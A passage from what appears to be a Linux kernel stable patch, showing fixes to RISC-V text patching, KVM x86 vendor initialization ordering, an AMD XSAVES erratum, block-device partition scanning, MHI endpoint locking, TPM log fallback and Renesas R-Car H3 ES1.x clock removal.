++	 * kprobes takes text_mutex, before calling patch_text(), but as we call
++	 * calls stop_machine(), the lockdep assertion in patch_insn_write()
++	 * gets confused by the context in which the lock is taken.
++	 * Instead, ensure the lock is held before calling stop_machine(), and
++	 * set riscv_patch_in_stop_machine to skip the check in
++	 * patch_insn_write().
++	 */
++	lockdep_assert_held(&text_mutex);
++	riscv_patch_in_stop_machine = true;
++	ret = stop_machine_cpuslocked(patch_text_cb, &patch, cpu_online_mask);
++	riscv_patch_in_stop_machine = false;
++	return ret;
+ }
+ NOKPROBE_SYMBOL(patch_text);
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index f9a5a7c90ff09..64a9c093aef93 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -101,7 +101,7 @@ void notrace walk_stackframe(struct task_struct *task,
+ 	while (!kstack_end(ksp)) {
+ 		if (__kernel_text_address(pc) && unlikely(!fn(arg, pc)))
+ 			break;
+-		pc = (*ksp++) - 0x4;
++		pc = READ_ONCE_NOCHECK(*ksp++) - 0x4;
+ 	}
+ }
+ 
+diff --git a/arch/um/kernel/vmlinux.lds.S b/arch/um/kernel/vmlinux.lds.S
+index 16e49bfa2b426..53d719c04ba94 100644
+--- a/arch/um/kernel/vmlinux.lds.S
++++ b/arch/um/kernel/vmlinux.lds.S
+@@ -1,4 +1,4 @@
+-
++#define RUNTIME_DISCARD_EXIT
+ KERNEL_STACK_SIZE = 4096 * (1 << CONFIG_KERNEL_STACK_ORDER);
+ 
+ #ifdef CONFIG_LD_SCRIPT_STATIC
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index 6aaae18f18544..24480b4f1c575 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1760,6 +1760,9 @@ extern struct kvm_x86_ops kvm_x86_ops;
+ #define KVM_X86_OP_OPTIONAL_RET0 KVM_X86_OP
+ #include <asm/kvm-x86-ops.h>
+ 
++int kvm_x86_vendor_init(struct kvm_x86_init_ops *ops);
++void kvm_x86_vendor_exit(void);
++
+ #define __KVM_HAVE_ARCH_VM_ALLOC
+ static inline struct kvm *kvm_arch_alloc_vm(void)
+ {
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index f769d6d08b433..06f2ede1544f4 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -880,6 +880,15 @@ void init_spectral_chicken(struct cpuinfo_x86 *c)
+ 		}
+ 	}
+ #endif
++	/*
++	 * Work around Erratum 1386.  The XSAVES instruction malfunctions in
++	 * certain circumstances on Zen1/2 uarch, and not all parts have had
++	 * updated microcode at the time of writing (March 2023).
++	 *
++	 * Affected parts all have no supervisor XSAVE states, meaning that
++	 * the XSAVEC instruction (which works fine) is equivalent.
++	 */
++	clear_cpu_cap(c, X86_FEATURE_XSAVES);
+ }
+ 
+ static void init_amd_zn(struct cpuinfo_x86 *c)
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 22d054ba5939a..f03bdaf79c886 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -5097,15 +5097,34 @@ static struct kvm_x86_init_ops svm_init_ops __initdata = {
+ 
+ static int __init svm_init(void)
+ {
++	int r;
++
+ 	__unused_size_checks();
+ 
+-	return kvm_init(&svm_init_ops, sizeof(struct vcpu_svm),
+-			__alignof__(struct vcpu_svm), THIS_MODULE);
++	r = kvm_x86_vendor_init(&svm_init_ops);
++	if (r)
++		return r;
++
++	/*
++	 * Common KVM initialization _must_ come last, after this, /dev/kvm is
++	 * exposed to userspace!
++	 */
++	r = kvm_init(&svm_init_ops, sizeof(struct vcpu_svm),
++		     __alignof__(struct vcpu_svm), THIS_MODULE);
++	if (r)
++		goto err_kvm_init;
++
++	return 0;
++
++err_kvm_init:
++	kvm_x86_vendor_exit();
++	return r;
+ }
+ 
+ static void __exit svm_exit(void)
+ {
+ 	kvm_exit();
++	kvm_x86_vendor_exit();
+ }
+ 
+ module_init(svm_init)
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 939e395cda3ff..cb547a0833812 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -551,6 +551,33 @@ static int hv_enable_l2_tlb_flush(struct kvm_vcpu *vcpu)
+ 	return 0;
+ }
+ 
++static void hv_reset_evmcs(void)
++{
++	struct hv_vp_assist_page *vp_ap;
++
++	if (!static_branch_unlikely(&enable_evmcs))
++		return;
++
++	/*
++	 * KVM should enable eVMCS if and only if all CPUs have a VP assist
++	 * page, and should reject CPU onlining if eVMCS is enabled the CPU
++	 * doesn't have a VP assist page allocated.
++	 */
++	vp_ap = hv_get_vp_assist_page(smp_processor_id());
++	if (WARN_ON_ONCE(!vp_ap))
++		return;
++
++	/*
++	 * Reset everything to support using non-enlightened VMCS access later
++	 * (e.g. when we reload the module with enlightened_vmcs=0)
++	 */
++	vp_ap->nested_control.features.directhypercall = 0;
++	vp_ap->current_nested_vmcs = 0;
++	vp_ap->enlighten_vmentry = 0;
++}
++
++#else /* IS_ENABLED(CONFIG_HYPERV) */
++static void hv_reset_evmcs(void) {}
+ #endif /* IS_ENABLED(CONFIG_HYPERV) */
+ 
+ /*
+@@ -2527,6 +2554,8 @@ static void vmx_hardware_disable(void)
+ 	if (cpu_vmxoff())
+ 		kvm_spurious_fault();
+ 
++	hv_reset_evmcs();
++
+ 	intel_pt_handle_vmx(0);
+ }
+ 
+@@ -8492,41 +8521,23 @@ static void vmx_cleanup_l1d_flush(void)
+ 	l1tf_vmx_mitigation = VMENTER_L1D_FLUSH_AUTO;
+ }
+ 
+-static void vmx_exit(void)
++static void __vmx_exit(void)
+ {
++	allow_smaller_maxphyaddr = false;
++
+ #ifdef CONFIG_KEXEC_CORE
+ 	RCU_INIT_POINTER(crash_vmclear_loaded_vmcss, NULL);
+ 	synchronize_rcu();
+ #endif
++	vmx_cleanup_l1d_flush();
++}
+ 
++static void vmx_exit(void)
++{
+ 	kvm_exit();
++	kvm_x86_vendor_exit();
+ 
+-#if IS_ENABLED(CONFIG_HYPERV)
+-	if (static_branch_unlikely(&enable_evmcs)) {
+-		int cpu;
+-		struct hv_vp_assist_page *vp_ap;
+-		/*
+-		 * Reset everything to support using non-enlightened VMCS
+-		 * access later (e.g. when we reload the module with
+-		 * enlightened_vmcs=0)
+-		 */
+-		for_each_online_cpu(cpu) {
+-			vp_ap =	hv_get_vp_assist_page(cpu);
+-
+-			if (!vp_ap)
+-				continue;
+-
+-			vp_ap->nested_control.features.directhypercall = 0;
+-			vp_ap->current_nested_vmcs = 0;
+-			vp_ap->enlighten_vmentry = 0;
+-		}
+-
+-		static_branch_disable(&enable_evmcs);
+-	}
+-#endif
+-	vmx_cleanup_l1d_flush();
+-
+-	allow_smaller_maxphyaddr = false;
++	__vmx_exit();
+ }
+ module_exit(vmx_exit);
+ 
+@@ -8567,23 +8578,20 @@ static int __init vmx_init(void)
+ 	}
+ #endif
+ 
+-	r = kvm_init(&vmx_init_ops, sizeof(struct vcpu_vmx),
+-		     __alignof__(struct vcpu_vmx), THIS_MODULE);
++	r = kvm_x86_vendor_init(&vmx_init_ops);
+ 	if (r)
+ 		return r;
+ 
+ 	/*
+-	 * Must be called after kvm_init() so enable_ept is properly set
++	 * Must be called after common x86 init so enable_ept is properly set
+ 	 * up. Hand the parameter mitigation value in which was stored in
+ 	 * the pre module init parser. If no parameter was given, it will
+ 	 * contain 'auto' which will be turned into the default 'cond'
+ 	 * mitigation mode.
+ 	 */
+ 	r = vmx_setup_l1d_flush(vmentry_l1d_flush_param);
+-	if (r) {
+-		vmx_exit();
+-		return r;
+-	}
++	if (r)
++		goto err_l1d_flush;
+ 
+ 	vmx_setup_fb_clear_ctrl();
+ 
+@@ -8607,6 +8615,21 @@ static int __init vmx_init(void)
+ 	if (!enable_ept)
+ 		allow_smaller_maxphyaddr = true;
+ 
++	/*
++	 * Common KVM initialization _must_ come last, after this, /dev/kvm is
++	 * exposed to userspace!
++	 */
++	r = kvm_init(&vmx_init_ops, sizeof(struct vcpu_vmx),
++		     __alignof__(struct vcpu_vmx), THIS_MODULE);
++	if (r)
++		goto err_kvm_init;
++
+ 	return 0;
++
++err_kvm_init:
++	__vmx_exit();
++err_l1d_flush:
++	kvm_x86_vendor_exit();
++	return r;
+ }
+ module_init(vmx_init);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index a2c299d47e69c..0ec7a0cb5da81 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -9292,7 +9292,16 @@ static struct notifier_block pvclock_gtod_notifier = {
+ 
+ int kvm_arch_init(void *opaque)
+ {
+-	struct kvm_x86_init_ops *ops = opaque;
++	return 0;
++}
++
++void kvm_arch_exit(void)
++{
++
++}
++
++int kvm_x86_vendor_init(struct kvm_x86_init_ops *ops)
++{
+ 	u64 host_pat;
+ 	int r;
+ 
+@@ -9382,8 +9391,9 @@ out_free_x86_emulator_cache:
+ 	kmem_cache_destroy(x86_emulator_cache);
+ 	return r;
+ }
++EXPORT_SYMBOL_GPL(kvm_x86_vendor_init);
+ 
+-void kvm_arch_exit(void)
++void kvm_x86_vendor_exit(void)
+ {
+ #ifdef CONFIG_X86_64
+ 	if (hypervisor_is_type(X86_HYPER_MS_HYPERV))
+@@ -9410,6 +9420,7 @@ void kvm_arch_exit(void)
+ 	WARN_ON(static_branch_unlikely(&kvm_xen_enabled.key));
+ #endif
+ }
++EXPORT_SYMBOL_GPL(kvm_x86_vendor_exit);
+ 
+ static int __kvm_emulate_halt(struct kvm_vcpu *vcpu, int state, int reason)
+ {
+diff --git a/block/blk.h b/block/blk.h
+index 4c3b3325219a5..e835f21d48af0 100644
+--- a/block/blk.h
++++ b/block/blk.h
+@@ -427,7 +427,7 @@ int bio_add_hw_page(struct request_queue *q, struct bio *bio,
+ 
+ struct request_queue *blk_alloc_queue(int node_id);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner);
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode);
+ 
+ int disk_alloc_events(struct gendisk *disk);
+ void disk_add_events(struct gendisk *disk);
+diff --git a/block/genhd.c b/block/genhd.c
+index 23cf83b3331cd..9c4c9aa559ab8 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -356,9 +356,10 @@ void disk_uevent(struct gendisk *disk, enum kobject_action action)
+ }
+ EXPORT_SYMBOL_GPL(disk_uevent);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ {
+ 	struct block_device *bdev;
++	int ret = 0;
+ 
+ 	if (disk->flags & (GENHD_FL_NO_PART | GENHD_FL_HIDDEN))
+ 		return -EINVAL;
+@@ -366,16 +367,29 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
+ 		return -EINVAL;
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
+-	/* Someone else has bdev exclusively open? */
+-	if (disk->part0->bd_holder && disk->part0->bd_holder != owner)
+-		return -EBUSY;
+ 
+ 	set_bit(GD_NEED_PART_SCAN, &disk->state);
+-	bdev = blkdev_get_by_dev(disk_devt(disk), mode, NULL);
++	/*
++	 * If the device is opened exclusively by current thread already, it's
++	 * safe to scan partitons, otherwise, use bd_prepare_to_claim() to
++	 * synchronize with other exclusive openers and other partition
++	 * scanners.
++	 */
++	if (!(mode & FMODE_EXCL)) {
++		ret = bd_prepare_to_claim(disk->part0, disk_scan_partitions);
++		if (ret)
++			return ret;
++	}
++
++	bdev = blkdev_get_by_dev(disk_devt(disk), mode & ~FMODE_EXCL, NULL);
+ 	if (IS_ERR(bdev))
+-		return PTR_ERR(bdev);
+-	blkdev_put(bdev, mode);
+-	return 0;
++		ret =  PTR_ERR(bdev);
++	else
++		blkdev_put(bdev, mode & ~FMODE_EXCL);
++
++	if (!(mode & FMODE_EXCL))
++		bd_abort_claiming(disk->part0, disk_scan_partitions);
++	return ret;
+ }
+ 
+ /**
+@@ -497,9 +511,14 @@ int __must_check device_add_disk(struct device *parent, struct gendisk *disk,
+ 		if (ret)
+ 			goto out_unregister_bdi;
+ 
++		/* Make sure the first partition scan will be proceed */
++		if (get_capacity(disk) && !(disk->flags & GENHD_FL_NO_PART) &&
++		    !test_bit(GD_SUPPRESS_PART_SCAN, &disk->state))
++			set_bit(GD_NEED_PART_SCAN, &disk->state);
++
+ 		bdev_add(disk->part0, ddev->devt);
+ 		if (get_capacity(disk))
+-			disk_scan_partitions(disk, FMODE_READ, NULL);
++			disk_scan_partitions(disk, FMODE_READ);
+ 
+ 		/*
+ 		 * Announce the disk and partitions after all partitions are
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 96617512982e5..9c5f637ff153f 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -467,10 +467,10 @@ static int blkdev_bszset(struct block_device *bdev, fmode_t mode,
+  * user space. Note the separate arg/argp parameters that are needed
+  * to deal with the compat_ptr() conversion.
+  */
+-static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
+-			       unsigned long arg, void __user *argp)
++static int blkdev_common_ioctl(struct block_device *bdev, fmode_t mode,
++			       unsigned int cmd, unsigned long arg,
++			       void __user *argp)
+ {
+-	struct block_device *bdev = I_BDEV(file->f_mapping->host);
+ 	unsigned int max_sectors;
+ 
+ 	switch (cmd) {
+@@ -528,8 +528,7 @@ static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
+ 			return -EACCES;
+ 		if (bdev_is_partition(bdev))
+ 			return -EINVAL;
+-		return disk_scan_partitions(bdev->bd_disk, mode & ~FMODE_EXCL,
+-					    file);
++		return disk_scan_partitions(bdev->bd_disk, mode);
+ 	case BLKTRACESTART:
+ 	case BLKTRACESTOP:
+ 	case BLKTRACETEARDOWN:
+@@ -607,7 +606,7 @@ long blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
+ 	if (ret != -ENOIOCTLCMD)
+ 		return ret;
+ 
+@@ -676,7 +675,7 @@ long compat_blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
+ 	if (ret == -ENOIOCTLCMD && disk->fops->compat_ioctl)
+ 		ret = disk->fops->compat_ioctl(bdev, mode, cmd, arg);
+ 
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 357c61c12ce5b..edd153dda40c0 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -990,44 +990,25 @@ static void mhi_ep_abort_transfer(struct mhi_ep_cntrl *mhi_cntrl)
+ static void mhi_ep_reset_worker(struct work_struct *work)
+ {
+ 	struct mhi_ep_cntrl *mhi_cntrl = container_of(work, struct mhi_ep_cntrl, reset_work);
+-	struct device *dev = &mhi_cntrl->mhi_dev->dev;
+ 	enum mhi_state cur_state;
+-	int ret;
+ 
+-	mhi_ep_abort_transfer(mhi_cntrl);
++	mhi_ep_power_down(mhi_cntrl);
++
++	mutex_lock(&mhi_cntrl->state_lock);
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
+ 	/* Reset MMIO to signal host that the MHI_RESET is completed in endpoint */
+ 	mhi_ep_mmio_reset(mhi_cntrl);
+ 	cur_state = mhi_cntrl->mhi_state;
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+ 
+ 	/*
+ 	 * Only proceed further if the reset is due to SYS_ERR. The host will
+ 	 * issue reset during shutdown also and we don't need to do re-init in
+ 	 * that case.
+ 	 */
+-	if (cur_state == MHI_STATE_SYS_ERR) {
+-		mhi_ep_mmio_init(mhi_cntrl);
+-
+-		/* Set AMSS EE before signaling ready state */
+-		mhi_ep_mmio_set_env(mhi_cntrl, MHI_EE_AMSS);
+-
+-		/* All set, notify the host that we are ready */
+-		ret = mhi_ep_set_ready_state(mhi_cntrl);
+-		if (ret)
+-			return;
+-
+-		dev_dbg(dev, "READY state notification sent to the host\n");
++	if (cur_state == MHI_STATE_SYS_ERR)
++		mhi_ep_power_up(mhi_cntrl);
+ 
+-		ret = mhi_ep_enable(mhi_cntrl);
+-		if (ret) {
+-			dev_err(dev, "Failed to enable MHI endpoint: %d\n", ret);
+-			return;
+-		}
+-
+-		enable_irq(mhi_cntrl->irq);
+-	}
++	mutex_unlock(&mhi_cntrl->state_lock);
+ }
+ 
+ /*
+@@ -1106,11 +1087,11 @@ EXPORT_SYMBOL_GPL(mhi_ep_power_up);
+ 
+ void mhi_ep_power_down(struct mhi_ep_cntrl *mhi_cntrl)
+ {
+-	if (mhi_cntrl->enabled)
++	if (mhi_cntrl->enabled) {
+ 		mhi_ep_abort_transfer(mhi_cntrl);
+-
+-	kfree(mhi_cntrl->mhi_event);
+-	disable_irq(mhi_cntrl->irq);
++		kfree(mhi_cntrl->mhi_event);
++		disable_irq(mhi_cntrl->irq);
++	}
+ }
+ EXPORT_SYMBOL_GPL(mhi_ep_power_down);
+ 
+@@ -1400,8 +1381,8 @@ int mhi_ep_register_controller(struct mhi_ep_cntrl *mhi_cntrl,
+ 
+ 	INIT_LIST_HEAD(&mhi_cntrl->st_transition_list);
+ 	INIT_LIST_HEAD(&mhi_cntrl->ch_db_list);
+-	spin_lock_init(&mhi_cntrl->state_lock);
+ 	spin_lock_init(&mhi_cntrl->list_lock);
++	mutex_init(&mhi_cntrl->state_lock);
+ 	mutex_init(&mhi_cntrl->event_lock);
+ 
+ 	/* Set MHI version and AMSS EE before enumeration */
+diff --git a/drivers/bus/mhi/ep/sm.c b/drivers/bus/mhi/ep/sm.c
+index 3655c19e23c7b..fd200b2ac0bb2 100644
+--- a/drivers/bus/mhi/ep/sm.c
++++ b/drivers/bus/mhi/ep/sm.c
+@@ -63,24 +63,23 @@ int mhi_ep_set_m0_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	int ret;
+ 
+ 	/* If MHI is in M3, resume suspended channels */
+-	spin_lock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
++
+ 	old_state = mhi_cntrl->mhi_state;
+ 	if (old_state == MHI_STATE_M3)
+ 		mhi_ep_resume_channels(mhi_cntrl);
+ 
+ 	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M0);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+-
+ 	if (ret) {
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	/* Signal host that the device moved to M0 */
+ 	ret = mhi_ep_send_state_change_event(mhi_cntrl, MHI_STATE_M0);
+ 	if (ret) {
+ 		dev_err(dev, "Failed sending M0 state change event\n");
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	if (old_state == MHI_STATE_READY) {
+@@ -88,11 +87,14 @@ int mhi_ep_set_m0_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 		ret = mhi_ep_send_ee_event(mhi_cntrl, MHI_EE_AMSS);
+ 		if (ret) {
+ 			dev_err(dev, "Failed sending AMSS EE event\n");
+-			return ret;
++			goto err_unlock;
+ 		}
+ 	}
+ 
+-	return 0;
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
++	return ret;
+ }
+ 
+ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+@@ -100,13 +102,12 @@ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
+ 	int ret;
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
+-	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M3);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
+ 
++	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M3);
+ 	if (ret) {
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	mhi_ep_suspend_channels(mhi_cntrl);
+@@ -115,10 +116,13 @@ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	ret = mhi_ep_send_state_change_event(mhi_cntrl, MHI_STATE_M3);
+ 	if (ret) {
+ 		dev_err(dev, "Failed sending M3 state change event\n");
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+-	return 0;
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
++	return ret;
+ }
+ 
+ int mhi_ep_set_ready_state(struct mhi_ep_cntrl *mhi_cntrl)
+@@ -127,22 +131,24 @@ int mhi_ep_set_ready_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	enum mhi_state mhi_state;
+ 	int ret, is_ready;
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
++
+ 	/* Ensure that the MHISTATUS is set to RESET by host */
+ 	mhi_state = mhi_ep_mmio_masked_read(mhi_cntrl, EP_MHISTATUS, MHISTATUS_MHISTATE_MASK);
+ 	is_ready = mhi_ep_mmio_masked_read(mhi_cntrl, EP_MHISTATUS, MHISTATUS_READY_MASK);
+ 
+ 	if (mhi_state != MHI_STATE_RESET || is_ready) {
+ 		dev_err(dev, "READY state transition failed. MHI host not in RESET state\n");
+-		spin_unlock_bh(&mhi_cntrl->state_lock);
+-		return -EIO;
++		ret = -EIO;
++		goto err_unlock;
+ 	}
+ 
+ 	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_READY);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+-
+ 	if (ret)
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+ 
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
+ 	return ret;
+ }
+diff --git a/drivers/char/tpm/eventlog/acpi.c b/drivers/char/tpm/eventlog/acpi.c
+index 0913d3eb8d518..cd266021d0103 100644
+--- a/drivers/char/tpm/eventlog/acpi.c
++++ b/drivers/char/tpm/eventlog/acpi.c
+@@ -143,8 +143,12 @@ int tpm_read_log_acpi(struct tpm_chip *chip)
+ 
+ 	ret = -EIO;
+ 	virt = acpi_os_map_iomem(start, len);
+-	if (!virt)
++	if (!virt) {
++		dev_warn(&chip->dev, "%s: Failed to map ACPI memory\n", __func__);
++		/* try EFI log next */
++		ret = -ENODEV;
+ 		goto err;
++	}
+ 
+ 	memcpy_fromio(log->bios_event_log, virt, len);
+ 
+diff --git a/drivers/clk/renesas/Kconfig b/drivers/clk/renesas/Kconfig
+index cacaf9b87d264..37632a0659d82 100644
+--- a/drivers/clk/renesas/Kconfig
++++ b/drivers/clk/renesas/Kconfig
+@@ -22,7 +22,7 @@ config CLK_RENESAS
+ 	select CLK_R8A7791 if ARCH_R8A7791 || ARCH_R8A7793
+ 	select CLK_R8A7792 if ARCH_R8A7792
+ 	select CLK_R8A7794 if ARCH_R8A7794
+-	select CLK_R8A7795 if ARCH_R8A77950 || ARCH_R8A77951
++	select CLK_R8A7795 if ARCH_R8A77951
+ 	select CLK_R8A77960 if ARCH_R8A77960
+ 	select CLK_R8A77961 if ARCH_R8A77961
+ 	select CLK_R8A77965 if ARCH_R8A77965
+diff --git a/drivers/clk/renesas/r8a7795-cpg-mssr.c b/drivers/clk/renesas/r8a7795-cpg-mssr.c
+index 301475c74f500..7a585a777d387 100644
+--- a/drivers/clk/renesas/r8a7795-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a7795-cpg-mssr.c
+@@ -128,7 +128,6 @@ static struct cpg_core_clk r8a7795_core_clks[] __initdata = {
+ };
+ 
+ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+-	DEF_MOD("fdp1-2",		 117,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fdp1-1",		 118,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fdp1-0",		 119,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("tmu4",			 121,	R8A7795_CLK_S0D6),
+@@ -162,7 +161,6 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("pcie1",		 318,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("pcie0",		 319,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac30",		 326,	R8A7795_CLK_S3D1),
+-	DEF_MOD("usb3-if1",		 327,	R8A7795_CLK_S3D1), /* ES1.x */
+ 	DEF_MOD("usb3-if0",		 328,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac31",		 329,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac0",		 330,	R8A7795_CLK_S3D1),
+@@ -187,28 +185,21 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("hscif0",		 520,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("thermal",		 522,	R8A7795_CLK_CP),
+ 	DEF_MOD("pwm",			 523,	R8A7795_CLK_S0D12),
+-	DEF_MOD("fcpvd3",		 600,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpvd2",		 601,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvd1",		 602,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvd0",		 603,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvb1",		 606,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpvb0",		 607,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpvi2",		 609,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpvi1",		 610,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpvi0",		 611,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpf2",		 613,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpf1",		 614,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpf0",		 615,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpci1",		 616,	R8A7795_CLK_S2D1), /* ES1.x */
+-	DEF_MOD("fcpci0",		 617,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpcs",		 619,	R8A7795_CLK_S0D1),
+-	DEF_MOD("vspd3",		 620,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("vspd2",		 621,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspd1",		 622,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspd0",		 623,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspbc",		 624,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("vspbd",		 626,	R8A7795_CLK_S0D1),
+-	DEF_MOD("vspi2",		 629,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("vspi1",		 630,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("vspi0",		 631,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("ehci3",		 700,	R8A7795_CLK_S3D2),
+@@ -221,7 +212,6 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("cmm2",			 709,	R8A7795_CLK_S2D1),
+ 	DEF_MOD("cmm1",			 710,	R8A7795_CLK_S2D1),
+ 	DEF_MOD("cmm0",			 711,	R8A7795_CLK_S2D1),
+-	DEF_MOD("csi21",		 713,	R8A7795_CLK_CSI0), /* ES1.x */
+ 	DEF_MOD("csi20",		 714,	R8A7795_CLK_CSI0),
+ 	DEF_MOD("csi41",		 715,	R8A7795_CLK_CSI0),
+ 	DEF_MOD("csi40",		 716,	R8A7795_CLK_CSI0),
+@@ -350,103 +340,26 @@ static const struct rcar_gen3_cpg_pll_config cpg_pll_configs[16] __initconst = {
+ 	{ 2,		192,	1,	192,	1,	32,	},
+ };
+ 
+-static const struct soc_device_attribute r8a7795es1[] __initconst = {
++static const struct soc_device_attribute r8a7795_denylist[] __initconst = {
+ 	{ .soc_id = "r8a7795", .revision = "ES1.*" },
+ 	{ /* sentinel */ }
+ };
+ 
+-
+-	/*
+-	 * Fixups for R-Car H3 ES1.x
+-	 */
+-
+-static const unsigned int r8a7795es1_mod_nullify[] __initconst = {
+-	MOD_CLK_ID(326),			/* USB-DMAC3-0 */
+-	MOD_CLK_ID(329),			/* USB-DMAC3-1 */
+-	MOD_CLK_ID(700),			/* EHCI/OHCI3 */
+-	MOD_CLK_ID(705),			/* HS-USB-IF3 */
+-
+-};
+-
+-static const struct mssr_mod_reparent r8a7795es1_mod_reparent[] __initconst = {
+-	{ MOD_CLK_ID(118), R8A7795_CLK_S2D1 },	/* FDP1-1 */
+-	{ MOD_CLK_ID(119), R8A7795_CLK_S2D1 },	/* FDP1-0 */
+-	{ MOD_CLK_ID(121), R8A7795_CLK_S3D2 },	/* TMU4 */
+-	{ MOD_CLK_ID(217), R8A7795_CLK_S3D1 },	/* SYS-DMAC2 */
+-	{ MOD_CLK_ID(218), R8A7795_CLK_S3D1 },	/* SYS-DMAC1 */
